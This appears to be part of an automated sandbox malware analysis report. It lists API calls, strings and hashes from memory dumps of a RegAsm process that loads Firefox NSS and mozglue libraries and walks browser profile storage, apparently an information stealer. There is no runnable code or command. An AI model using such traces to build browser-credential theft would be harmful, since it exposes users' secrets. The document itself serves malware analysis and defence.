                                                                                 • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: DigestK11_$Error$CriticalEnterSectionUnlockValue
                                                                                • String ID:
                                                                                • API String ID: 3186484790-0
                                                                                APIs
                                                                                • PORT_ArenaMark_Util.NSS3(?), ref: 6C942E08
                                                                                  • Part of subcall function 6C9314C0: TlsGetValue.KERNEL32 ref: 6C9314E0
                                                                                  • Part of subcall function 6C9314C0: EnterCriticalSection.KERNEL32 ref: 6C9314F5
                                                                                  • Part of subcall function 6C9314C0: PR_Unlock.NSS3 ref: 6C93150D
                                                                                • PORT_NewArena_Util.NSS3(00000400), ref: 6C942E1C
                                                                                • PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6C942E3B
                                                                                • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C942E95
                                                                                  • Part of subcall function 6C931200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C8D88A4,00000000,00000000), ref: 6C931228
                                                                                  • Part of subcall function 6C931200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C931238
                                                                                  • Part of subcall function 6C931200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C8D88A4,00000000,00000000), ref: 6C93124B
                                                                                  • Part of subcall function 6C931200: PR_CallOnce.NSS3(6CA32AA4,6C9312D0,00000000,00000000,00000000,?,6C8D88A4,00000000,00000000), ref: 6C93125D
                                                                                  • Part of subcall function 6C931200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C93126F
                                                                                  • Part of subcall function 6C931200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C931280
                                                                                  • Part of subcall function 6C931200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C93128E
                                                                                  • Part of subcall function 6C931200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C93129A
                                                                                  • Part of subcall function 6C931200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C9312A1
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
                                                                                • String ID:
                                                                                • API String ID: 1441289343-0
                                                                                APIs
                                                                                • CERT_NewCertList.NSS3 ref: 6C8FACC2
                                                                                  • Part of subcall function 6C8D2F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C8D2F0A
                                                                                  • Part of subcall function 6C8D2F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C8D2F1D
                                                                                  • Part of subcall function 6C8D2AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6C8D0A1B,00000000), ref: 6C8D2AF0
                                                                                  • Part of subcall function 6C8D2AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C8D2B11
                                                                                • CERT_DestroyCertList.NSS3(00000000), ref: 6C8FAD5E
                                                                                  • Part of subcall function 6C9157D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C8DB41E,00000000,00000000,?,00000000,?,6C8DB41E,00000000,00000000,00000001,?), ref: 6C9157E0
                                                                                  • Part of subcall function 6C9157D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C915843
                                                                                • CERT_DestroyCertList.NSS3(?), ref: 6C8FAD36
                                                                                  • Part of subcall function 6C8D2F50: CERT_DestroyCertificate.NSS3(?), ref: 6C8D2F65
                                                                                  • Part of subcall function 6C8D2F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C8D2F83
                                                                                • free.MOZGLUE(?), ref: 6C8FAD4F
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
                                                                                • String ID:
                                                                                • API String ID: 132756963-0
                                                                                APIs
                                                                                • PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6C92F0AD,6C92F150,?,6C92F150,?,?,?), ref: 6C92ECBA
                                                                                  • Part of subcall function 6C930FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C8D87ED,00000800,6C8CEF74,00000000), ref: 6C931000
                                                                                  • Part of subcall function 6C930FF0: PR_NewLock.NSS3(?,00000800,6C8CEF74,00000000), ref: 6C931016
                                                                                  • Part of subcall function 6C930FF0: PL_InitArenaPool.NSS3(00000000,security,6C8D87ED,00000008,?,00000800,6C8CEF74,00000000), ref: 6C93102B
                                                                                • PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6C92ECD1
                                                                                  • Part of subcall function 6C9310C0: TlsGetValue.KERNEL32(?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C9310F3
                                                                                  • Part of subcall function 6C9310C0: EnterCriticalSection.KERNEL32(?,?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C93110C
                                                                                  • Part of subcall function 6C9310C0: PL_ArenaAllocate.NSS3(?,?,?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C931141
                                                                                  • Part of subcall function 6C9310C0: PR_Unlock.NSS3(?,?,?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C931182
                                                                                  • Part of subcall function 6C9310C0: TlsGetValue.KERNEL32(?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C93119C
                                                                                • PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6C92ED02
                                                                                  • Part of subcall function 6C9310C0: PL_ArenaAllocate.NSS3(?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C93116E
                                                                                • PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6C92ED5A
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
                                                                                • String ID:
                                                                                • API String ID: 2957673229-0
                                                                                APIs
                                                                                • PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6C947FFA,?,6C949767,?,8B7874C0,0000A48E), ref: 6C95EDD4
                                                                                • realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6C947FFA,?,6C949767,?,8B7874C0,0000A48E), ref: 6C95EDFD
                                                                                • PORT_Alloc_Util.NSS3(?,00000000,00000000,6C947FFA,?,6C949767,?,8B7874C0,0000A48E), ref: 6C95EE14
                                                                                  • Part of subcall function 6C930BE0: malloc.MOZGLUE(6C928D2D,?,00000000,?), ref: 6C930BF8
                                                                                  • Part of subcall function 6C930BE0: TlsGetValue.KERNEL32(6C928D2D,?,00000000,?), ref: 6C930C15
                                                                                • memcpy.VCRUNTIME140(?,?,6C949767,00000000,00000000,6C947FFA,?,6C949767,?,8B7874C0,0000A48E), ref: 6C95EE33
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
                                                                                • String ID:
                                                                                • API String ID: 3903481028-0
                                                                                APIs
                                                                                • GetCurrentThreadId.KERNEL32 ref: 6C7CB4F5
                                                                                • AcquireSRWLockExclusive.KERNEL32(6C83F4B8), ref: 6C7CB502
                                                                                • ReleaseSRWLockExclusive.KERNEL32(6C83F4B8), ref: 6C7CB542
                                                                                • free.MOZGLUE(?), ref: 6C7CB578
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650238110.000000006C7B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c7b0000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                • String ID:
                                                                                • API String ID: 2047719359-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                • String ID:
                                                                                • API String ID: 284873373-0
                                                                                APIs
                                                                                • PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6C965F17,?,?,?,?,?,?,?,?,6C96AAD4), ref: 6C97AC94
                                                                                • PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6C965F17,?,?,?,?,?,?,?,?,6C96AAD4), ref: 6C97ACA6
                                                                                • free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6C96AAD4), ref: 6C97ACC0
                                                                                • free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6C96AAD4), ref: 6C97ACDB
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: free$DestroyFreeK11_Monitor
                                                                                • String ID:
                                                                                • API String ID: 3989322779-0
                                                                                • Opcode ID: 727a83ce4f5ec1979d95eacbd9345e8397bcf120e3a72b8a0d706e055a358107
                                                                                • Instruction ID: 371bff513e4ae1331b5b880e952c7046c587179d46182e527e4b93726bdcfd4b
                                                                                • Opcode Fuzzy Hash: 727a83ce4f5ec1979d95eacbd9345e8397bcf120e3a72b8a0d706e055a358107
                                                                                • Instruction Fuzzy Hash: BD0180B1601B169BE720DF29D905753B7E8BF00669B084839D85AC3E00EB34E015CBE1
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                • String ID:
                                                                                • API String ID: 3016257755-0
                                                                                APIs
                                                                                • PK11_FreeSymKey.NSS3(?,6C965D40,00000000,?,?,6C956AC6,6C96639C), ref: 6C97AC2D
                                                                                  • Part of subcall function 6C91ADC0: TlsGetValue.KERNEL32(?,6C8FCDBB,?,6C8FD079,00000000,00000001), ref: 6C91AE10
                                                                                  • Part of subcall function 6C91ADC0: EnterCriticalSection.KERNEL32(?,?,6C8FCDBB,?,6C8FD079,00000000,00000001), ref: 6C91AE24
                                                                                  • Part of subcall function 6C91ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C8FD079,00000000,00000001), ref: 6C91AE5A
                                                                                  • Part of subcall function 6C91ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C8FCDBB,?,6C8FD079,00000000,00000001), ref: 6C91AE6F
                                                                                  • Part of subcall function 6C91ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C8FCDBB,?,6C8FD079,00000000,00000001), ref: 6C91AE7F
                                                                                  • Part of subcall function 6C91ADC0: TlsGetValue.KERNEL32(?,6C8FCDBB,?,6C8FD079,00000000,00000001), ref: 6C91AEB1
                                                                                  • Part of subcall function 6C91ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C8FCDBB,?,6C8FD079,00000000,00000001), ref: 6C91AEC9
                                                                                • PK11_FreeSymKey.NSS3(?,6C965D40,00000000,?,?,6C956AC6,6C96639C), ref: 6C97AC44
                                                                                • SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,6C965D40,00000000,?,?,6C956AC6,6C96639C), ref: 6C97AC59
                                                                                • free.MOZGLUE(8CB6FF01,6C956AC6,6C96639C,?,?,?,?,?,?,?,?,?,6C965D40,00000000,?,6C96AAD4), ref: 6C97AC62
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
                                                                                • String ID:
                                                                                • API String ID: 1595327144-0
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                • lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                • lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                • lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prologlstrcatlstrcpylstrlen
                                                                                • String ID:
                                                                                • API String ID: 809291720-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalDeleteSectionfree
                                                                                • String ID:
                                                                                • API String ID: 2988086103-0
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 0040AFB4
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 00410CDD: _EH_prolog.MSVCRT ref: 00410CE2
                                                                                  • Part of subcall function 00410CDD: GetFileAttributesA.KERNEL32(00000000,?,0040BAC2,?,00425C4E,?,?), ref: 00410CF6
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 0040A981: _EH_prolog.MSVCRT ref: 0040A986
                                                                                  • Part of subcall function 0040A981: wsprintfA.USER32 ref: 0040A9AF
                                                                                  • Part of subcall function 0040A981: FindFirstFileA.KERNEL32(?,?), ref: 0040A9C6
                                                                                  • Part of subcall function 0040A981: StrCmpCA.SHLWAPI(?,00425EE4), ref: 0040A9E3
                                                                                  • Part of subcall function 0040A981: StrCmpCA.SHLWAPI(?,00425EE8), ref: 0040A9FD
                                                                                  • Part of subcall function 0040A981: lstrlenA.KERNEL32(00000000,00425C2A,00000000,?,?,?,00425EEC,?,?,00425C27), ref: 0040AAAD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$lstrcpy$Filelstrcatlstrlen$AttributesFindFirstwsprintf
                                                                                • String ID: .metadata-v2$\storage\default\
                                                                                • API String ID: 2418158533-762053450
                                                                                APIs
                                                                                • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C924D57
                                                                                • PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6C924DE6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorR_snprintf
                                                                                • String ID: %d.%d
                                                                                • API String ID: 2298970422-3954714993
                                                                                APIs
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 0040E062
                                                                                  • Part of subcall function 0041E560: std::exception::exception.LIBCMT ref: 0041E575
                                                                                  • Part of subcall function 0041E560: __CxxThrowException@8.LIBCMT ref: 0041E58A
                                                                                  • Part of subcall function 0041E560: std::exception::exception.LIBCMT ref: 0041E59B
                                                                                  • Part of subcall function 0040DE51: std::_Xinvalid_argument.LIBCPMT ref: 0040DE62
                                                                                • memcpy.MSVCRT ref: 0040E0BD
                                                                                Strings
                                                                                • invalid string position, xrefs: 0040E05D
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throwmemcpy
                                                                                • String ID: invalid string position
                                                                                • API String ID: 214693668-1799206989
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Xinvalid_argumentmemcpystd::_
                                                                                • String ID: string too long
                                                                                • API String ID: 1835169507-2556327735
                                                                                • Opcode ID: a7804603839e34a47926d4d4e8eea39133707d68188460ae4548f68c22849222
                                                                                • Instruction ID: a8c71809997a943f8247e46865462385ee80d849e33b5082b4ef7bb8c1a6b5f3
                                                                                • Opcode Fuzzy Hash: a7804603839e34a47926d4d4e8eea39133707d68188460ae4548f68c22849222
                                                                                • Instruction Fuzzy Hash: 2411CB317006509BDB349F6EC940A6BB7A9EF41754710493FF443AB2C1CBBADC198799
                                                                                APIs
                                                                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C7F3D19
                                                                                • mozalloc_abort.MOZGLUE(?), ref: 6C7F3D6C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650238110.000000006C7B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c7b0000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: _errnomozalloc_abort
                                                                                • String ID: d
                                                                                • API String ID: 3471241338-2564639436
                                                                                • Opcode ID: fe1ff99925f00082701d6fa08d5a4c1fbcc1bcd0276cc11f3c210a2167514f71
                                                                                • Instruction ID: 5487c9d79ff8acbd7a0a15677fe2e4ec205ff22101c3228d6b89627c9e336618
                                                                                • Opcode Fuzzy Hash: fe1ff99925f00082701d6fa08d5a4c1fbcc1bcd0276cc11f3c210a2167514f71
                                                                                • Instruction Fuzzy Hash: 4E110431E04688D7DB108BA9CD5A4EDB775EF86318B449229DC589B702EB30A985C3E1
                                                                                APIs
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 0040DCAE
                                                                                  • Part of subcall function 0041E560: std::exception::exception.LIBCMT ref: 0041E575
                                                                                  • Part of subcall function 0041E560: __CxxThrowException@8.LIBCMT ref: 0041E58A
                                                                                  • Part of subcall function 0041E560: std::exception::exception.LIBCMT ref: 0041E59B
                                                                                • memmove.MSVCRT ref: 0040DCE7
                                                                                Strings
                                                                                • invalid string position, xrefs: 0040DCA9
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentmemmovestd::_
                                                                                • String ID: invalid string position
                                                                                • API String ID: 1659287814-1799206989
                                                                                • Opcode ID: 6c3c7ea44ad9e5e0a92ce9f69708ac908520c95cb6c982ad81dc5019ca06bff5
                                                                                • Instruction ID: 013243cbf8bd52bdbb76082f5a08148d0adace471495ead66214a40d62cc662f
                                                                                • Opcode Fuzzy Hash: 6c3c7ea44ad9e5e0a92ce9f69708ac908520c95cb6c982ad81dc5019ca06bff5
                                                                                • Instruction Fuzzy Hash: B701F9317042048BE3248E98DD8095BB7A6EF85710720493ED48297385DAB8FC4AD39C
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Value$calloc
                                                                                • String ID:
                                                                                • API String ID: 3339632435-0
                                                                                • Opcode ID: 51f0d8102a6d326c2dc98c1997613637e0c32fb78736c01e18086aca5111034e
                                                                                • Instruction ID: 01b790a73f07d21d85af17be92fb7758e7582f2aedd125bf4e358f083701d112
                                                                                • Opcode Fuzzy Hash: 51f0d8102a6d326c2dc98c1997613637e0c32fb78736c01e18086aca5111034e
                                                                                • Instruction Fuzzy Hash: 7D31B5B07447A58BDB245F7CC98426977B8BF06348F11B669D88DC7A91EB34C485CB82